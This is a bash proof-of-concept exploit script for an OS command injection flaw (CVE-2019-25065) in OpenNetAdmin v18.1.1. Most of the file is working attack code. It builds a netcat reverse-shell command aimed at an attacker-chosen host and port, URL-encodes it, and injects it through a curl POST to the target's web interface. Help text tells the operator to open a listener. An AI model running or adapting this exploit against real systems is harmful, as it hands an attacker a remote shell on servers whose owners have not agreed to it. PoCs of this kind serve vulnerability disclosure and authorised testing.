#!/bin/bash display_help() { echo "This is a POC of CVE-2019-25065 - OS command injection in OpenNetAdmin v18.1.1" echo "The exploit runs a reverse shell command on the target system." echo -e "When running the exploit, make sure to open a listener in the port you specfiied in the lport parameter.\n" echo -e "Usage: $0 [options]\n" echo "Options:" echo " -u, --url url of the ONA web interace ; example: http://remote_server/ona/" echo " --lhost listening host" echo " --lport listening port" echo -e " -h, --help Display help information\n" echo "### dependencies: gridsite-clients package" } OPTIONS=$(getopt -o "hu:" --long "help,url:,lhost:,lport:" -n exploit.sh -- "$@" 2> /tmp/error) if [ $? -ne 0 ]; then grep "requires" /tmp/error > /dev/null if [ $? -eq 0 ]; then err1=$(cat /tmp/error); echo -e "$err1\nUse -h/--help for help" && exit 1 fi error_flags=$(awk -F\' '{print $2}' /tmp/error | tr -d "\n"); echo -e "exploit.sh: invalid option -- '$error_flags'\nUse -h/--help for help";exit 1 fi eval set -- "$OPTIONS" if [ $? -ne 0 ]; then cat /tmp/error fi while true; do case $1 in -u | --url) URL="$2";shift 2;; --lhost) lhost="$2";shift 2;; --lport) lport="$2";shift 2;; -h | --help) display_help;exit 0;; --) shift; break;; esac done [ -z "$URL" ] && echo -e "exploit.sh: option -u/--url is required\nUse -h/--help for help" && exit 1 [ -z "$lhost" ] && echo -e "exploit.sh: option --lhost is required\nUse -h/--help for help" && exit 1 [ -z "$lport" ] && echo -e "exploit.sh: option --lport is required\nUse -h/--help for help" && exit 1 cmd="rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc $lhost $lport > /tmp/f" which urlencode >&/dev/null; [ $? -ne 0 ] && echo "'gridsite-clients' package is not installed" && exit 1 e_cmd=$(urlencode $cmd) echo "[+] exploit started, make sure to open a listener at the port you specified (example: nc -lnvp 443)";sleep 3 curl -m 8 --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]\ =tooltips&xajaxargs[]=ip%3D%3E;$e_cmd;&xajaxargs[]=ping" "$URL" echo "[+] done"